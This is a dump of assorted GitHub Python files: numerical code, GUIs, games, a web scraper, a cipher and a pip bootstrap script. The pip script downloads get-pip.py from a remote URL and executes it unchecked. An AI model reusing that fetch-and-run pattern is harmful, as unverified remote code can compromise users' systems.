env4.mutate_barrier_h(.25)\n    env5 = env2.create_child()\n    env5.mutate_barrier_h(.25)\n    env6 = env2.create_child()\n    env6.mutate_barrier_h(.25)\n\n    envs = [env0, env1, env2, env3, env4, env5, env6]\n\n    for dir, mult_env_file in zip(POET_DIRS, MULT_ENV_FILES):\n\n        print(\"initiating test on: \", dir)\n        p = POET_TEST(dir, envs)\n        for i in range(5, 201, 5):\n            print(i)\n            p.evaluate_gen(i)\n            print()\n        for f in p.csvs_dict.values():\n            f.close()\n\n        print(\"initiating test on: \", mult_env_file)\n        p = MULT_ENV_TEST(mult_env_file, envs)\n        for i in range(5, 201, 5):\n            print(i)\n            p.evaluate_gen(i)\n            print()\n        for f in p.csvs_dict.values():\n            f.close()","repo_name":"fhtanaka/SGR","sub_path":"evaluators/poet_evaluator.py","file_name":"poet_evaluator.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"15439616625","text":"from ..base import MetricsBase\nfrom modnas.registry.metrics import register\n\n\n@register\nclass ValidateMetrics(MetricsBase):\n    \"\"\"Estimator validation metrics class.\"\"\"\n\n    def __init__(self, field=None):\n        super().__init__()\n        self.field = field\n\n    def __call__(self, model):\n        \"\"\"Return metrics output.\"\"\"\n        estim = self.estim\n        val_res = estim.valid_epoch(model=model)\n        if isinstance(val_res, dict):\n            field = self.field\n            default_res = list(val_res.values())[0]\n            if field is None:\n                val_res = default_res\n            elif field in val_res:\n                val_res = val_res[field]\n            else:\n                self.logger.error('field \\\"{}\\\" not exists, using default'.format(field))\n                val_res = default_res\n        return val_res\n","repo_name":"FlowEternal/pointlanenet","sub_path":"model/vega/algorithms/nas/modnas/metrics/predefined/estim.py","file_name":"estim.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"25626200079","text":"import argparse\nimport logging\nimport math\nimport profile\n\nfrom matrix import Matrix, Vector\nfrom utils import read_data, save_to_file\n\nfrom numpy.linalg import solve, eig\nimport numpy as np\n#from benchmark import numpy_eig\n\ndef numpy_eigs(matrix, my_values, my_vectors):\n    print(\"My eigenvalues:\")\n    print(my_values)\n    print(\"My eigenvectors:\")\n    print(my_vectors)\n\n    a = np.array(matrix.get_data())\n    eig_np = eig(a)\n    print(\"Numpy eigenvalues:\")\n    print(eig_np[0].round(3))\n    print(\"Numpy eigenvectors:\")\n    print(eig_np[1].round(3))\n\n\ndef t(A):\n    return math.sqrt(sum([A[i][j] ** 2 for i in range(len(A)) \n                 for j in range(i + 1, len(A))]))\n\n\ndef indexes_max_elem(A):\n    # track the largest off-diagonal element; start from (0, 1) so a\n    # diagonal entry can never be returned\n    i_max, j_max = 0, 1\n    a_max = abs(A[0][1])\n    for i in range(len(A)):\n        for j in range(i + 1, len(A)):\n            if abs(A[i][j]) > 
a_max:\n a_max = abs(A[i][j])\n i_max, j_max = i, j\n return i_max, j_max\n\n\ndef get_phi(a_ii, a_jj, a_ij):\n return math.pi / 4 if a_ii == a_jj else \\\n 0.5 * math.atan(2 * a_ij / (a_ii - a_jj))\n\n\ndef jacobi_eigenvalue(A, eps):\n sz = len(A)\n A_i = Matrix(A)\n eigenvectors = Matrix.identity(sz)\n\n a = 0\n while True:\n U = Matrix.identity(sz)\n i, j = indexes_max_elem(A_i)\n phi = get_phi(A_i[i][i], A_i[j][j], A_i[i][j])\n U[i][j] = -math.sin(phi)\n U[j][i] = math.sin(phi)\n U[i][i] = U[j][j] = math.cos(phi)\n\n U_T = Matrix(U)\n U_T.transpose()\n A_i = U_T.multiply(A_i.multiply(U))\n\n eigenvectors = eigenvectors.multiply(U)\n\n if t(A_i) < eps:\n break\n a += 1\n\n eigenvalues = A_i.diag()\n return eigenvalues, eigenvectors\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--input', required=True, help='Input file')\n parser.add_argument('--output', required=True, help='Output file')\n args = parser.parse_args()\n\n logging.basicConfig(filename=\"1-4.log\", level=logging.INFO)\n\n need_args = ('matrix', 'eps')\n init_dict = read_data(args.input, need_args)\n A, eps = init_dict['matrix'], init_dict['eps']\n\n values, vectors = jacobi_eigenvalue(A, eps)\n numpy_eigs(A, values, vectors)\n save_to_file(args.output, eigenvalues=values, eigenvectors=vectors)\n\nif __name__ == '__main__':\n profile.run('main()')","repo_name":"Nebezcoda/mai_study","sub_path":"NM/lab1/1-4/jacobi_method.py","file_name":"jacobi_method.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"20902124386","text":"# coding=utf-8\n\nimport os, sys\nimport urllib\n\n# down load get-pip.py\ndef report_hook(count, blockSize, totalSize):\n percent = int(count * blockSize * 100 / totalSize)\n sys.stdout.write(\"\\r%d%%\" % percent + ' completed')\n sys.stdout.flush()\n\nurl = 'https://raw.github.com/pypa/pip/master/contrib/get-pip.py'\nprint('download begin, please wait...')\n\nfile_path, headers = urllib.urlretrieve(url, reporthook = report_hook)\n\nwith open(file_path, \"rb\") as fr:\n data = fr.read()\n\nwith open('./download.py','wb') as fw:\n fw.write(data)\n\nprint('')\nprint('download success, installing...')\n\n# install pip by calling get-pip.py(i.e. 
download.py)\nimport download\ndownload.main()\n\n\n","repo_name":"zhanglintc/wb","sub_path":"auto_install_pip.py","file_name":"auto_install_pip.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"}
+{"seq_id":"27459055732","text":"\nfrom PyQt5.QtWidgets import (QFormLayout, QApplication, QWidget, QLabel, QLineEdit, QDialogButtonBox, QDialog, QHBoxLayout, QVBoxLayout, QListWidget, QPushButton, QMessageBox)\nfrom PyQt5.QtGui import QIcon, QPalette, QColor\nfrom PyQt5.QtCore import Qt, QModelIndex\n\nfrom datetime import datetime, timedelta\nimport copy\nimport enum\n\nfrom Task import *\nfrom Backlog import *\n\nclass State(enum.Enum):\n\n    ADDING_TASK = 0\n    DELETE_TASK = 1\n    SELECT_TASK = 2\n\nclass EditBacklogGUI(QDialog):\n\n    def __init__(self, parent, iBacklog):\n        super().__init__(parent)\n\n        self.backlog = iBacklog \n\n        self.tempoBacklog = copy.deepcopy(self.backlog)\n\n        self.currTask = Task()\n\n        self.tempoTask = Task()\n\n        self.currRowSelected = 0\n\n        self.newItemEnum = 0\n\n        self.listState = State.SELECT_TASK\n\n        self.currTaskErrors = list()\n\n        self.initUI()\n\n    def initUI(self):\n\n        self.setWindowTitle(\"Edit tasks\")\n        self.resize(1000, 400)\n\n        mainLayout = QVBoxLayout(self)\n        listViewTaskViewLayout = QHBoxLayout()\n        self.listViewLayout = QVBoxLayout()\n\n        self.listTasksView = QListWidget(self)\n        \n        self.layoutCurrTask = QFormLayout()\n\n        self.initCurrTaskLineEdits()\n\n        self.addTaskButton = QPushButton(self)\n        self.addTaskButton.setIcon(QIcon(\"Images//plus_icon.png\"))\n        self.addTaskButton.clicked.connect(self.manageAddTaskClickedButton)\n\n        self.deleteTaskButton = QPushButton(self)\n        self.deleteTaskButton.setIcon(QIcon(\"Images//minus_icon.png\"))\n        self.deleteTaskButton.clicked.connect(self.manageDeleteTaskClickedButton)\n\n        self.buttonbox = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)\n\n        self.buttonbox.accepted.connect(self.accept)\n        self.buttonbox.rejected.connect(self.reject)\n\n        self.listViewLayout.addWidget(self.listTasksView)\n        self.listViewLayout.addWidget(self.addTaskButton)\n        self.listViewLayout.addWidget(self.deleteTaskButton)\n\n        listViewTaskViewLayout.addLayout(self.listViewLayout)\n        listViewTaskViewLayout.addLayout(self.layoutCurrTask)\n\n        mainLayout.addLayout(listViewTaskViewLayout)\n        mainLayout.addWidget(self.buttonbox)\n\n        self.invalidTaskErrMsg = QMessageBox()\n        self.invalidTaskErrMsg.setText(\"The current task is invalid.\")\n        self.invalidTaskErrMsg.setIcon(QMessageBox.Critical)\n\n        self.initListViewOfTasks()\n\n        self.updateCurrTaskSelected()\n\n    def exec_(self):\n\n        self.tempoBacklog = copy.deepcopy(self.backlog)\n\n        self.initListViewOfTasks()\n\n        self.updateCurrTaskSelected()\n\n        self.titleInputErr.setVisible(False)\n        self.prjCodeInputErr.setVisible(False)\n        \n        self.exec()\n\n    def initCurrTaskLineEdits(self):\n\n        self.titleInputErr = QLabel(self)\n\n        self.titleInput = QLineEdit(self)\n        self.titleInput.editingFinished.connect(self.manageTitleEntered)\n\n        self.prjCodeInputErr = QLabel(self)\n        self.prjCodeInput = QLineEdit(self)\n        self.completedTime = QLineEdit(self)\n        self.estimatedTime = QLineEdit(self)\n        self.percAccomplished = QLineEdit(self)\n        self.percAccomplished.setEnabled(False)\n\n        self.redPalette = QPalette()\n        redColor = QColor(255, 0, 0)\n        self.redPalette.setColor(QPalette.WindowText, redColor)\n\n        self.titleInputErr.setText(\"* A title is required.\")\n        self.layoutCurrTask.addWidget(self.titleInputErr)\n        self.titleInputErr.setVisible(False)\n        
self.titleInputErr.setPalette(self.redPalette)\n\n self.layoutCurrTask.addRow(\"Title:\", self.titleInput)\n \n self.prjCodeInputErr.setText(\"* A project code is required.\")\n self.layoutCurrTask.addWidget(self.prjCodeInputErr)\n self.prjCodeInputErr.setVisible(False)\n self.prjCodeInputErr.setPalette(self.redPalette)\n\n self.layoutCurrTask.addRow(\"Project code:\", self.prjCodeInput)\n self.layoutCurrTask.addRow(\"Completed time:\", self.completedTime)\n self.layoutCurrTask.addRow(\"Estimated time:\", self.estimatedTime)\n self.layoutCurrTask.addRow(\"Percentage accomplished:\", self.percAccomplished)\n\n def manageTitleEntered(self):\n\n self.updateTextRowListView(self.currRowSelected, self.titleInput.text())\n \n def manageCurrRowChangeList(self):\n\n prevRowSelected = self.currRowSelected\n self.currRowSelected = self.listTasksView.currentRow()\n\n if self.listState == State.ADDING_TASK:\n pass\n elif self.listState == State.DELETE_TASK:\n pass\n else:\n\n self.updateTaskFromLineEdits(self.tempoTask)\n\n isTaskNotValid = self.tempoBacklog.validateTask(self.tempoTask)\n\n if len(isTaskNotValid):\n self.titleInputErr.setVisible(True)\n self.prjCodeInputErr.setVisible(True)\n self.currRowSelected = prevRowSelected\n self.listTasksView.setCurrentRow(self.currRowSelected)\n\n else:\n self.titleInputErr.setVisible(False)\n self.prjCodeInputErr.setVisible(False)\n\n self.updateTaskFromLineEdits(self.currTask)\n\n self.updateTextRowListView(prevRowSelected, self.currTask.title)\n\n self.updateCurrTaskSelected()\n\n def updateCurrTaskSelected(self):\n\n tasks = self.tempoBacklog.tasks\n\n if self.currRowSelected >= 0 and self.currRowSelected < len(tasks):\n self.currTask = tasks[self.currRowSelected]\n else:\n self.currTask = Task()\n\n self.updateCurrTaskLineEdits()\n\n def updateCurrTaskLineEdits(self):\n\n self.titleInput.setText(self.currTask.title)\n self.prjCodeInput.setText(self.currTask.prjCode)\n\n compTime = str(timedelta(seconds = self.currTask.completedTime))\n self.completedTime.setText(compTime)\n\n estimatedTime = str(timedelta(seconds = self.currTask.estimatedTime))\n self.estimatedTime.setText(estimatedTime)\n\n self.percAccomplished = str(self.currTask.completionRatio)\n\n def initListViewOfTasks(self):\n\n self.listTasksView.clear()\n\n for currTask in self.tempoBacklog.tasks:\n \n self.listTasksView.addItem(currTask.title)\n\n self.currRowSelected = 0\n self.listTasksView.setCurrentRow(self.currRowSelected)\n\n self.listTasksView.itemSelectionChanged.connect(self.manageCurrRowChangeList)\n \n def manageAddTaskClickedButton(self):\n\n self.listState = State.ADDING_TASK\n\n self.newItemEnum += 1\n \n self.listTasksView.addItem('New Item {}'.format(str(self.newItemEnum)))\n\n lastRowListView = self.listTasksView.count() - 1\n self.listTasksView.setCurrentRow(lastRowListView)\n\n self.tempoBacklog.addTask(Task())\n\n self.updateCurrTaskSelected()\n\n self.listState = State.SELECT_TASK\n\n def manageDeleteTaskClickedButton(self):\n\n self.newItemEnum -= 1\n\n self.listState = State.DELETE_TASK\n\n self.listTasksView.takeItem(self.currRowSelected)\n \n self.currRowSelected = self.listTasksView.currentRow()\n\n countListItems = self.listTasksView.count()\n\n if countListItems >= 0:\n\n self.tempoBacklog.deleteTask(self.currTask)\n\n self.updateCurrTaskSelected()\n\n self.listState = State.SELECT_TASK\n\n def updateTaskFromLineEdits(self, iTask):\n \n iTask.title = self.titleInput.text()\n iTask.prjCode = self.prjCodeInput.text()\n\n 
iTask.setCompletedTime(self.completedTime.text())\n iTask.setEstimatedTime(self.estimatedTime.text())\n\n def closeEvent(self, event):\n\n self.reject()\n\n def accept(self):\n\n self.updateTaskFromLineEdits(self.tempoTask)\n\n isTaskNotValid = self.backlog.validateTask(self.tempoTask)\n\n if len(isTaskNotValid):\n\n self.invalidTaskErrMsg.exec()\n self.titleInputErr.setVisible(True)\n self.prjCodeInputErr.setVisible(True)\n return\n \n else:\n self.updateTaskFromLineEdits(self.currTask)\n\n self.close()\n\n def updateTextRowListView(self, iRow, iTaskTitle):\n\n item = self.listTasksView.item(iRow)\n item.setText(iTaskTitle)\n\n","repo_name":"patrick-deschambault/turboClock","sub_path":"EditBacklogGUI.py","file_name":"EditBacklogGUI.py","file_ext":"py","file_size_in_byte":8350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14761424516","text":"import string as _string\n\nimport numpy as _np\n\n\n\"\"\"\nQuasi-One Hot representation of characters.\n\"\"\"\n# this is what will mark a 'token boundary'\nnew_token_char = '\\n'\n\n# one hot dims for common classes\n_string_feature_names = ['ascii_lowercase', 'digits', 'punctuation',\n 'whitespace']\n\n# extra dims: is-uppercase, is-digit, is-punctutation, is-whitespace,\n# new token char, unknown char\n_other_feature_names = ['is_uppercase', 'is_digit', 'is_punctuation',\n 'is_whitespace', 'is_new_token_char', 'unknown']\n\n_feature_string = ''.join(\n [getattr(_string, feature_name) for feature_name in\n _string_feature_names] +\n [' ' for _ in _other_feature_names])\n\nfeature_length = len(_feature_string)\n\nfeature_names = ([\"string.\"+_str_feat_name+\"-\"+_str\n for _str_feat_name in _string_feature_names\n for _str in getattr(_string, _str_feat_name)]\n +\n _other_feature_names)\n\n\ndef _encode_char(char):\n \"\"\"\n Returns the quasi-one-hot index vector for a character.\n - alpha-characters are mapped to lower-case one-hot + 'is-uppercase'\n - digits are mapped to one-hot + 'is-digit'\n - punctuation marks are mapped to one-hot + 'is-punctuation'\n - whitespace (ecxept '\\n') characters are mapped to one-hot +\n 'is-whitespace'\n - unknowns have their own one-hot\n * '\\n' is treated as new-token-character\n\n Args:\n char: string\n Character to index\n\n Returns:\n index : np.ndarray, dtype=bool, shape=(~106,1)\n Index vector of character\n \"\"\"\n # make sure to process a single character\n if len(char) > 1:\n raise ValueError('can only cope with a single char.')\n\n index = _np.zeros((1, feature_length)).astype(bool)\n\n if (char.lower() in _feature_string[0:-len(_other_feature_names)]\n or char in _string.ascii_uppercase):\n index[0, _feature_string.index(char.lower())] = True\n else:\n index[0, feature_length-1] = True\n\n if char in _string.ascii_uppercase:\n index[0, feature_length-6] = True\n elif char in _string.digits:\n index[0, feature_length-5] = True\n elif char in _string.punctuation:\n index[0, feature_length-4] = True\n elif char in _string.whitespace or char == new_token_char:\n if char == new_token_char:\n index[0, feature_length-2] = True\n else:\n index[0, feature_length-3] = True\n\n return index\n\n\ndef _decode_matrix(matrix):\n \"\"\"\n Inverse of _encode().\n\n Args:\n index: np.ndarray, dtype=bool, shape=(~100,1)\n Index vector of character\n\n Returns:\n char: string\n Character of index\n\n \"\"\"\n chars = ''\n matrix = matrix.T\n for row in matrix:\n if row[feature_length-1]:\n char = '?'\n elif row[feature_length-2]:\n char = '\\n'\n 
else:\n char = _feature_string[row.tolist().index(True)]\n if row[feature_length-6]:\n char = char.upper()\n chars = ''.join(chars+char)\n return chars\n\n\ndef encode(chars):\n \"\"\"\n Converts chars to the quasi-one-hot matrix representation.\n\n Returns:\n quasi one-hot matrix of chars\n np.ndarray, dtype=bool, shape=(len(chars),feature_length)\n \"\"\"\n matrix = _np.zeros((len(chars), feature_length)).astype(bool)\n for rdx in range(len(chars)):\n matrix[rdx, ] = _encode_char(chars[rdx])\n return matrix.T\n\n\ndef decode(matrix):\n \"\"\"\n Convert matrix to the corresponding character representation.\n\n Returns:\n chars representation of matrix.\n \"\"\"\n return _decode_matrix(matrix)\n","repo_name":"bot-zen/tagger","sub_path":"tagger/representation/qonehotchars.py","file_name":"qonehotchars.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"28129218119","text":"from pygame import *\r\n\r\nwindow = display.set_mode((700,500))\r\nbackground = transform.scale(image.load('background.jpg'),(700,500))\r\ndisplay.set_caption('Пінг Понг')\r\n\r\nclass GameSprite(sprite.Sprite):\r\n\r\n def __init__(self,photo,rect_x,rect_y,speed,weight,height):\r\n super().__init__()\r\n self.weight = weight\r\n self.height = height\r\n self.image = transform.scale(image.load(photo),(self.weight,self.height))\r\n self.speed = speed\r\n self.rect = self.image.get_rect()\r\n self.rect.x = rect_x\r\n self.rect.y = rect_y\r\n\r\n def reset(self):\r\n window.blit(self.image,(self.rect.x,self.rect.y))\r\nclass Racket(GameSprite):\r\n def update_l(self):\r\n key_pressed = key.get_pressed()\r\n if key_pressed[K_w] and self.rect.y > 0:\r\n self.rect.y -= self.speed\r\n if key_pressed[K_s] and self.rect.y < 350:\r\n self.rect.y += self.speed\r\n def update_r(self):\r\n key_pressed = key.get_pressed()\r\n if key_pressed[K_UP] and self.rect.y > 0:\r\n self.rect.y -= self.speed\r\n if key_pressed[K_DOWN] and self.rect.y < 350:\r\n self.rect.y += self.speed\r\nclass Ball(GameSprite):\r\n\r\n def __init__(self,photo,rect_x,rect_y,speed,weight,height):\r\n super().__init__(photo,rect_x,rect_y,speed,weight,height)\r\n self.speed_x = speed\r\n self.speed_y = speed\r\n\r\n def update_ball(self):\r\n \r\n self.rect.y += self.speed_y\r\n self.rect.x += self.speed_x\r\n if self.rect.y > 450 or self.rect.y < 0:\r\n self.speed_y *= -1\r\n if self.rect.x > 650 or self.rect.x < 0:\r\n self.speed_x *= -1\r\n if sprite.collide_rect(racket_1,ball) or sprite.collide_rect(racket_2,ball):\r\n self.speed_x *= -1\r\n def set_to_start(self):\r\n\r\n ball.rect.x , ball.rect.y = 350,250\r\n racket_1.x , racket_1.y = 0, 0\r\n racket_2.x , racket_2.y = 650, 0\r\n \r\n\r\nclass MenuButton(sprite.Sprite):\r\n def __init__(self,photo,rect_x,rect_y,weight,height): \r\n super().__init__()\r\n self.weight = weight\r\n self.height = height\r\n self.image = transform.scale(image.load(photo),(self.weight,self.height))\r\n self.rect = self.image.get_rect()\r\n self.rect.x = rect_x\r\n self.rect.y = rect_y\r\n def reset(self):\r\n window.blit(self.image,(self.rect.x,self.rect.y))\r\n def collidepoint(self,x,y):\r\n return self.rect.collidepoint(x,y)\r\n def show_buttons(self):\r\n play_button.reset()\r\n replay_button.reset()\r\n exit_button.reset()\r\n\r\n\r\n\r\nracket_2 = Racket('rackk.png',650,0,7,50,150)\r\nracket_1 = Racket('rackk.png',0,0,7,50,150)\r\nball = Ball('balls.png',350,400,10,50,40)\r\nplay_button = 
MenuButton('play.png',240,100,250,70)\r\nreplay_button = MenuButton('replay.png',240,220,250,70)\r\nexit_button = MenuButton('exit.png',240,340,250,70)\r\nteam1 = 0\r\nteam2 = 0\r\nclock = time.Clock()\r\nFPS = 30\r\nfinish = True\r\ngame = True\r\n\r\nfont.init()\r\nfont2 = font.Font(None,72)\r\nfont1 = font.Font(None,36)\r\ntext_win1 = font2.render('PLAYER 1 WIN!',1,(255,215,0))\r\ntext_win2 = font2.render('PLAYER 2 WIN!',1,(255,215,0))\r\n\r\nwhile game:\r\n \r\n for i in event.get():\r\n if i.type == QUIT:\r\n game = False\r\n if i.type == MOUSEBUTTONDOWN and i.button == 1:\r\n x,y = i.pos\r\n if play_button.collidepoint(x,y):\r\n finish = False\r\n if replay_button.collidepoint(x,y):\r\n ball.set_to_start()\r\n team1 , team2 = 0,0\r\n finish = False\r\n\r\n if exit_button.collidepoint(x,y):\r\n game = False\r\n if i.type == KEYDOWN:\r\n if i.key == K_ESCAPE:\r\n if finish == True:\r\n finish = False\r\n elif finish == False:\r\n finish = True\r\n if i.key == K_r:\r\n ball.rect.x , ball.rect.y = 100,100\r\n racket_1.x , racket_1.y = 0, 0\r\n racket_2.x , racket_2.y = 650, 0\r\n finish = False\r\n if i.key == K_SPACE:\r\n finish = False\r\n\r\n if finish != True:\r\n window.blit(background,(0,0))\r\n racket_1.update_l()\r\n racket_2.update_r()\r\n ball.update_ball()\r\n\r\n number2 = font1.render('points:'+str(team2),1,(0,0,0))\r\n number1 = font1.render('points:'+str(team1),1,(0,0,0))\r\n racket_1.reset()\r\n racket_2.reset()\r\n ball.reset()\r\n window.blit(number1,(40,50))\r\n window.blit(number2,(560,50))\r\n\r\n if ball.rect.x < 0:\r\n team2 += 1\r\n if ball.rect.x > 650:\r\n team1 += 1\r\n if team2 == 5:\r\n window.blit(text_win2,(200,50))\r\n finish = True \r\n if team1 == 5:\r\n window.blit(text_win1,(200,50))\r\n finish = True\r\n else :\r\n\r\n play_button.reset()\r\n replay_button.reset()\r\n exit_button.reset()\r\n\r\n clock.tick(FPS)\r\n display.update()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"vrashaVer/ping-pong","sub_path":"ping.pong.py","file_name":"ping.pong.py","file_ext":"py","file_size_in_byte":5067,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8269553367","text":"from abc import ABC, abstractmethod\n\n\nclass DataBase_Object(ABC):\n \"\"\"\n This is an abstract class that must be inherited by any object that is being uploaded into a MySQL server\n using the sql_connection class\n \"\"\"\n\n fields_to_compress = [] # The fields of the object that need to be compressed\n table: str = '' # The table the object will be uploaded too\n primary_key: str = '' # the primary key of the object and table\n field_to_increment: str = None # If the object is being accessed and this needs to be tracked - this is the field\n unchanging_fields = []\n\n @abstractmethod\n def database_dict(self):\n \"\"\"\n This method must be implemented by any object inherting from DataBase Object\n It should return a dictionary with the values as strings of the database field names, and values as the\n values to be uploaded (types need to be correct). 
This dictionary should be in the same order as the \n table.\n :return: dict(string, value)\n \"\"\"\n raise NotImplementedError(\n \"Override this method in your class so it returns a dictionary with keys identical to the database\")\n\n def not_none(self, item):\n \"\"\"\n Checks if an item is an empty string, returning true if it is not.\n :param item: the string item to be checked\n :return: bool\n \"\"\"\n if str(item) == '':\n return False\n return True\n\n @staticmethod\n def normalize_for_varchar(word: str):\n \"\"\"\n Takes a value and normalizes it so it can be uploaded for a varchar \n :param str: The string value that will be held in mySQL as a varchar\n :return: \n \"\"\"\n string = str(word)\n return string.encode('utf-8', 'ignore').decode('utf-8').replace(\"'\", '')\n\n @abstractmethod\n def unique_where(self):\n \"\"\"\n Returns a MySQL string that is able to identify if the object is unique. All non key string values - VARCHAR \n values in mySQL - must be surrounded in /' characters. Do not include 'WHERE' or a preceding space in this\n string\n \n Ex: \n return f\"objects_unique_identifier_instance_variable_name='{corresponding_string_value}'\"\n :return: \n \"\"\"\n raise NotImplementedError(\n \"Override this method in your class so it returns a dictionary with keys identical to the database\")\n\n @staticmethod\n def from_database_json(JSON_dict):\n \"\"\"\n Returns an object based off database values\n\n Ex: \n car_JSON_data = connection_object.get_listings('Cars')[0]\n car_object = Car.from_database_json(car_JSON_data_\n :param JSON_dict: Dict representing database object\n :return: \n \"\"\"\n raise NotImplementedError(\n \"Override this method in your class so it returns a dictionary with keys identical to the database\")\n\n @staticmethod\n def generic_self():\n \"\"\"\n Returns a generic version of the object for testing.\n EX:\n generic_class_object = ClassName.generic_self()\n :return: generic database_object\n \"\"\"\n raise NotImplementedError(\n \"Override this method in your class so it returns a dictionary with keys identical to the database\")\n\n\n @staticmethod\n def real_self(sql_connection):\n \"\"\"\n Returns a an object with real values from the database for testing\n \n EX:\n real_database_data_object = ClassName.real_self()\n :return: \n \"\"\"\n raise NotImplementedError(\n \"Override this method in your class so it returns a dictionary with keys identical to the database\")\n\n\n","repo_name":"SpencerPinegar/Ad-Board-Scraper-Analyzer","sub_path":"Messenger_Pigeon/Objects/Database_Objects/database_object.py","file_name":"database_object.py","file_ext":"py","file_size_in_byte":3773,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"44056452630","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 13 15:30:49 2018\n\n@author: Kevin\n\"\"\"\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport csv\nimport datetime\n\n\"\"\"\nRed wine url: \n Category: Red wine (to exclude rose)\n Rating 4, 4.5 or 5. \n Dan Murphy's (not Connections). 
\n Price 5 - 30.\n\"\"\"\nsource = requests.get('https://www.danmurphys.com.au/dm/navigation/navigation'\n '_results_gallery.jsp?params=fh_location%3D%2F%2Fcatalo'\n 'g01%2Fen_AU%2Fcategories%3C%7Bcatalog01_25343743020259'\n '14%7D%2F5.0%3Cprice%3C30.0%2Fwebmaincategory%3E%7Bred2'\n '0wine%7D%2Fweb_dsv_flag%3E%7Bdan20murphy27s%7D%2Fbv_cu'\n 'stomer_ratings%3E%7B40%3B45%3B50%7D%26fh_view_size%3D1'\n '20%26fh_sort%3D-sales_value_30_days%26fh_modification%'\n '3D%2528secondid%253C%257Bdm_b999999000632%257D%252Cblo'\n 'cked%2529%252C%2528secondid%253C%257Bdm_mystery57%257D'\n '%252Cblocked%2529%252C%2528secondid%253C%257Bdm_myster'\n 'y52%257D%252Cblocked%2529%252C%2528secondid%253C%257Bd'\n 'm_757646%257D%252Cblocked%2529%252C%2528secondid%253C%'\n '257Bdm_610528%257D%252Cblocked%2529%252C%2528secondid%'\n '253C%257Bdm_786481%257D%252Cblocked%2529%252C%2528seco'\n 'ndid%253C%257Bdm_616722%257D%252Cblocked%2529%252C%252'\n '8instock%253D0%252Cbottom%2529&resetnav=false&storeExc'\n 'lusivePage=false').text\n\nsoup = BeautifulSoup(source, 'lxml')\n\n# \"today\" is the col name of the new col to be added to the existing df.\nnow = datetime.datetime.now()\ntoday = str(now.strftime(\"%Y-%m-%d\"))\n\ncsv_file = open('{}.csv'.format(today), 'w', newline = '') \n\ncsv_writer = csv.writer(csv_file)\ncsv_writer.writerow(['product_name', today])\n\nfor product in soup.find_all('div', {'class':'independent-product-module'}):\n product_name = product.div.h2.a['title']\n # Replace Frech letters with English\n translationTable = str.maketrans(\"éàèùâêîôóûç\", \"eaeuaeioouc\")\n product_name = product_name.translate(translationTable)\n try:\n price = product.find_all('li', {'class':'price-secondary'})[0]\\\n .p.span.text\n except IndexError:\n price = product.find_all('span',{'class':'price'})[0].text\n price = price.replace('$','')\n csv_writer.writerow([product_name, price])\n \ncsv_file.close()\n \n \n \n \n \n \n ","repo_name":"kanru-wang/web_scraping","sub_path":"web_scraping_prototype_dan.py","file_name":"web_scraping_prototype_dan.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35941669447","text":"import math\nimport pyperclip\n\n\ndef main():\n text = '''Charles Babbage, FRS (26 December 1791 - 18 October 1871) was an English\nmathematician, philosopher, inventor and mechanical engineer who originated the\nconcept of a programmable computer. Considered a \"father of the computer\",\nBabbage is credited with inventing the first mechanical computer that\neventually led to more complex designs. Parts of his uncompleted mechanisms are\non display in the London Science Museum. In 1991, a perfectly functioning\ndifference engine was constructed from Babbage's original plans. Built to\ntolerances achievable in the 19th century, the success of the finished engine\nindicated that Babbage's machine would have worked. 
Nine years later, the\nScience Museum completed the printer Babbage had designed for the difference\nengine.'''\n print(len(text))\n encrypted_text = encrypt_message(text, 6)\n print(encrypted_text + '|')\n print('\\n' + decrypt_message(encrypted_text, 6) + '|')\n pyperclip.copy(encrypted_text)\n\n\ndef encrypt_message(message, key):\n message = message.upper()\n ciphertext = [''] * key\n for col_number in range(key):\n pointer = col_number\n while pointer < len(message):\n ciphertext[col_number] += message[pointer]\n pointer += key\n return ''.join(ciphertext)\n\ndef decrypt_message(ciphertext, key):\n ciphertext = ciphertext.upper()\n num_of_rows = key\n num_of_columns = math.ceil(len(ciphertext) / key)\n num_of_unused_boxes = num_of_rows * num_of_columns - len(ciphertext)\n plaintext = [''] * num_of_columns\n column = 0\n row = 0\n for symbol in ciphertext:\n plaintext[column] += symbol\n column += 1\n if column == num_of_columns or (column == num_of_columns - 1 and row >=\n num_of_rows - num_of_unused_boxes):\n column = 0\n row += 1\n return ''.join(plaintext)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"KrolMateusz/Crypto","sub_path":"Alghoritms/transposition_cipher.py","file_name":"transposition_cipher.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42377556459","text":"from gi.repository import Gtk, Gio\n\nfrom .window import MainWindow\n\n\nclass GHueApplication(Gtk.Application):\n def __init__(self, controller):\n super(GHueApplication, self).__init__(application_id=\"com.github.alexsdutton.gnome_hue\",\n flags=Gio.ApplicationFlags.FLAGS_NONE)\n self.controller = controller\n self.connect(\"activate\", self.on_activate)\n\n def on_activate(self, data=None):\n window = MainWindow(self.controller)\n window.connect('destroy-event', Gtk.main_quit)\n window.show_all()\n 